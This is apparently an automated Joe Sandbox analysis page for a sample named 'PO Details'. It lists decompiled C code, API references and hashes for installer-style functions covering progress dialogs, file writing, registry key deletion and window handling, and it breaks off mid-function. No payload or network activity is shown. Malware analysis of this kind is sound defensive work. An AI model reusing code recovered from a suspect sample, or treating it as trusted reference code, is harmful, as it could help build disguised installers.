Instruction ID: 823bcf1188efb9b7d366f5ef1a6d41b1b29385d26c736e9fe045c9ef4d60f34e
Opcode Fuzzy Hash: c8185c7f1af49426c8239fea4623afeb8e8f70946cac9bc730e89d453d50e4fa
Instruction Fuzzy Hash: 66F0A2721065387BDA212AB6DC4CC9B7F9CEF9B2F5B110215F628A119085615D02D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F2B(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x2b86a
					_t11 =  *0x42aa24; // 0x2bff0
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402f3b
0x00402f49
0x00402f4f
0x00402f4f
0x00402f5d
0x00402f5f
0x00402f65
0x00402f6c
0x00402f6e
0x00402f6e
0x00402f84
0x00402f94
0x00402fa6
0x00402fa6
0x00402fae

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
MulDiv.KERNEL32(0002B86A,00000064,0002BFF0), ref: 00402F74
wsprintfW.USER32 ref: 00402F84
SetWindowTextW.USER32(?,?), ref: 00402F94
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6

Strings

verifying installer: %d%%, xrefs: 00402F7E

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
Instruction ID: 5483d255828af9cef8fcdd630f22e0c0956a10275527037d70a62c30cec8c61f
Opcode Fuzzy Hash: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
Instruction Fuzzy Hash: 29014471640209BBEF209F60DE49FEA3B79FB04344F008039FA06A51D0DBB995559F58

Uniqueness

Uniqueness Score: -1.00%

Function 6E4925B5 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E4925B5() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E6E49121B();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M6E4926E4))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x6e49407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6e49409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6E491470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x6e49506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x6e49506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x6e49506c);
								goto L17;
							case 5:
								_push( *0x6e49506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6e495000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E6E4912E1(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E6E491272(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x6e4925bf
0x6e4925c1
0x6e4925c5
0x6e4925d4
0x6e4925d8
0x6e4925dd
0x6e4925dd
0x6e4925e5
0x6e4925ec
0x6e4925f2
0x00000000
0x6e4925f9
0x00000000
0x00000000
0x6e492601
0x6e492605
0x6e492608
0x6e49260c
0x6e492613
0x6e492617
0x6e49261d
0x6e49261f
0x6e492621
0x6e492621
0x6e492628
0x00000000
0x00000000
0x6e492631
0x00000000
0x00000000
0x6e492638
0x6e49263e
0x6e492648
0x6e49264e
0x6e492653
0x00000000
0x00000000
0x6e492674
0x00000000
0x00000000
0x6e49265a
0x6e492660
0x6e492661
0x6e492663
0x00000000
0x00000000
0x6e49267c
0x6e49267e
0x6e492684
0x6e49268a
0x6e49268a
0x00000000
0x00000000
0x6e4925f2
0x6e49268d
0x6e49268d
0x6e492692
0x6e4926a3
0x6e4926a3
0x6e4926a9
0x6e4926ae
0x6e4926b3
0x6e4926bf
0x6e4926c4
0x00000000
0x6e4926c9
0x6e4926b5
0x6e4926b6
0x6e4926ca
0x6e4926ca
0x6e4926b3
0x6e4926cb
0x6e4926cc
0x6e4926cf
0x6e4926e3

APIs

Part of subcall function 6E49121B: GlobalAlloc.KERNEL32(00000040,?,6E49123B,?,6E4912DF,00000019,6E4911BE,-000000A0), ref: 6E491225

GlobalFree.KERNEL32(?), ref: 6E4926A3
GlobalFree.KERNEL32(00000000), ref: 6E4926D8

Memory Dump Source

Source File: 00000001.00000002.9314657277.000000006E491000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E490000, based on PE: true

Associated: 00000001.00000002.9314566108.000000006E490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314713092.000000006E494000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314753504.000000006E496000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e490000_PO Details.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: daf0a245832edf161d8c2dda437b765144b37f2fbcd8d18bccabc5eacbb12d01
Instruction ID: 65c762bdca6621512349c649ce38f4c8cdb33c50216aa1e9707fc0cd14640def
Opcode Fuzzy Hash: daf0a245832edf161d8c2dda437b765144b37f2fbcd8d18bccabc5eacbb12d01
Instruction Fuzzy Hash: CC31AD31104502EFCB14AFB5E894C6A7BBAFBD6305311452EE110B3610DB31AC16EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402947(int __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x38)) = 0xfffffd66;
				_t50 = E00402D3E(0xfffffff0);
				 *(_t56 - 0x40) = _t23;
				if(E00405D5D(_t50) == 0) {
					E00402D3E(0xffffffed);
				}
				E00405EE2(_t50);
				_t26 = E00405F07(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x434f18;
					 *(_t56 - 0x44) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040347D(_t45);
						E00403467(_t49,  *(_t56 - 0x44));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x28));
						 *(_t56 - 0x10) = _t54;
						if(_t54 != _t45) {
							E0040324C( *((intOrPtr*)(_t56 - 0x2c)), _t45, _t54,  *(_t56 - 0x28));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x3c) =  *_t54;
								E00405EC2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x3c);
							}
							GlobalFree( *(_t56 - 0x10));
						}
						E00405FB9( *(_t56 + 8), _t49,  *(_t56 - 0x44));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x38)) = E0040324C(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x38)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x40));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x00402947
0x00402949
0x00402955
0x00402958
0x00402962
0x00402966
0x00402966
0x0040296c
0x00402979
0x00402981
0x00402984
0x0040298a
0x00402998
0x0040299d
0x004029a1
0x004029a4
0x004029ad
0x004029b9
0x004029bd
0x004029c0
0x004029ca
0x004029e9
0x004029d1
0x004029d6
0x004029de
0x004029e1
0x004029e6
0x004029e6
0x004029f0
0x004029f0
0x004029fd
0x00402a03
0x00402a15
0x00402a15
0x00402a1b
0x00402a1b
0x00402a26
0x00402a27
0x00402a2b
0x00402a2f
0x00402a35
0x00402a35
0x00402a3c
0x004022e9
0x00402bc5
0x00402bd1

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
GlobalFree.KERNEL32(?), ref: 004029F0
GlobalFree.KERNEL32(00000000), ref: 00402A03
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: a5ba4848feea4339aca0bd9ed9ef3b7077546e738993ad0ee054be50b6b812c9
Instruction ID: 6d3b5365c2144e4253305efdfeae8c7c86b7c4bf3cccdf3f9a106f7510f1e1f6
Opcode Fuzzy Hash: a5ba4848feea4339aca0bd9ed9ef3b7077546e738993ad0ee054be50b6b812c9
Instruction Fuzzy Hash: 6121BD71800124BBCF216FA9DE49D9F7E79EF05364F10023AF560762E1CB784D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 6E4923E0 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E4923E0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E6E4912BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E6E491243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M6E492558))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E6E491311(__ebp);
									goto L21;
								case 2:
									 *__edi = E6E491311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x6e49506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6e49506c, __eax,  *0x6e49506c, 0, 0);
									goto L27;
								case 4:
									__eax = E6E49122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E6E491311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x6e49506c =  *0x6e495074 + ( *(__esi + 0x18) - 1) *  *0x6e49506c * 2 + 0x18;
									 *__ebx =  *0x6e495074 + ( *(__esi + 0x18) - 1) *  *0x6e49506c * 2 + 0x18;
									asm("cdq");
									__eax = E6E491470(__edx,  *0x6e495074 + ( *(__esi + 0x18) - 1) *  *0x6e49506c * 2 + 0x18, __edx,  *0x6e495074 + ( *(__esi + 0x18) - 1) *  *0x6e49506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E6E49122C(0x6e495044);
					goto L10;
				}
			}

0x6e4923f4
0x6e4923f8
0x6e492403
0x6e492403
0x6e49240a
0x6e49240f
0x00000000
0x00000000
0x6e492413
0x6e492416
0x00000000
0x00000000
0x6e49241b
0x6e492426
0x6e492436
0x00000000
0x6e49242d
0x6e49242f
0x6e492445
0x00000000
0x6e492445
0x6e49241d
0x6e49241d
0x6e492446
0x6e492446
0x6e492448
0x6e49244c
0x6e49244c
0x6e49244f
0x6e49244f
0x6e492457
0x6e49245f
0x6e492462
0x6e492521
0x6e492522
0x6e49252d
0x6e492557
0x6e492557
0x6e49253d
0x6e492549
0x6e49253f
0x6e49253f
0x6e49253f
0x00000000
0x6e492468
0x6e492468
0x00000000
0x6e49246f
0x00000000
0x00000000
0x6e492477
0x00000000
0x00000000
0x6e492485
0x6e492487
0x00000000
0x00000000
0x6e4924a8
0x6e4924ae
0x6e4924b1
0x6e4924b3
0x6e4924c3
0x00000000
0x00000000
0x6e492490
0x6e492495
0x6e492498
0x6e492499
0x00000000
0x00000000
0x6e4924cf
0x6e4924d5
0x6e4924d6
0x6e4924d9
0x6e4924da
0x6e4924dc
0x00000000
0x00000000
0x6e4924e8
0x6e4924eb
0x6e4924f7
0x6e4924f9
0x00000000
0x00000000
0x6e492505
0x6e492511
0x6e492514
0x6e492516
0x6e492519
0x00000000
0x00000000
0x6e492468
0x6e492462
0x6e49243b
0x6e492440
0x00000000
0x6e492440

APIs

GlobalFree.KERNEL32(00000000), ref: 6E492522

Part of subcall function 6E49122C: lstrcpynW.KERNEL32(00000000,?,6E4912DF,00000019,6E4911BE,-000000A0), ref: 6E49123C

GlobalAlloc.KERNEL32(00000040), ref: 6E4924A8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E4924C3

Memory Dump Source

Source File: 00000001.00000002.9314657277.000000006E491000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E490000, based on PE: true

Associated: 00000001.00000002.9314566108.000000006E490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314713092.000000006E494000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.9314753504.000000006E496000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e490000_PO Details.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 4564bb0efc117916c064a11c3b9104ff016eae3182dd1ab501a0cf2e04da9381
Instruction ID: cf0922623fddfa1df4cf3ba75a3f103d9c468256a60fa3a166f57fcb2fe45993
Opcode Fuzzy Hash: 4564bb0efc117916c064a11c3b9104ff016eae3182dd1ab501a0cf2e04da9381
Instruction Fuzzy Hash: B741F070008705DFDB24AFB6E890E667BFCFB59314B00491FE455E7281EB709406EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402E41(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E0040627E(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402E41(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406806(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402e4c
0x00402e55
0x00402e5e
0x00402e6a
0x00402e73
0x00402e7d
0x00402ea2
0x00402ea8
0x00402ead
0x00402eae
0x00402ede
0x00402eb7
0x00402eb9
0x00402f09
0x00402f0c
0x00000000
0x00402f12
0x00402ec8
0x00402ecd
0x00402ecf
0x00000000
0x00000000
0x00402ed7
0x00402edc
0x00402edd
0x00402edd
0x00402eea
0x00402ef2
0x00402ef9
0x00000000
0x00402f22
0x00000000
0x00402f01
0x00402e8d
0x00402ea0
0x00000000
0x00000000
0x00000000
0x00402ea0
0x00402f28

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 6b0427dfa76692f151d7caa9231c5c88ba32a8d947b338249052deafdd589e1a
Instruction ID: 81522b48e592499502658fb4677f1b0f70c545d6b701466da39e5ccb8a756ba0
Opcode Fuzzy Hash: 6b0427dfa76692f151d7caa9231c5c88ba32a8d947b338249052deafdd589e1a
Instruction Fuzzy Hash: 0F215A72500109BBEF129F90CE89EEF7A7DEB54344F110076B945B11A0E7B48E54AAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D1C(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402D3E(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406358();
				}
				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402b08
0x00402b08
0x00402bc5
0x00402bd1

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
Instruction ID: ee10c8015a3e92cf614b22ba24180aec604fe5fe026a1179c0e7be4a3fdf0cdb
Opcode Fuzzy Hash: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
Instruction Fuzzy Hash: E621F672900119AFCB05DFA4DE45AEEBBB5EF08314F14003AFA45F62A0C7789D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D1C(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D1C(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402D3E(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402D3E(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402D3E();
					_t32 = E00402D3E();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D1C();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D1C(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
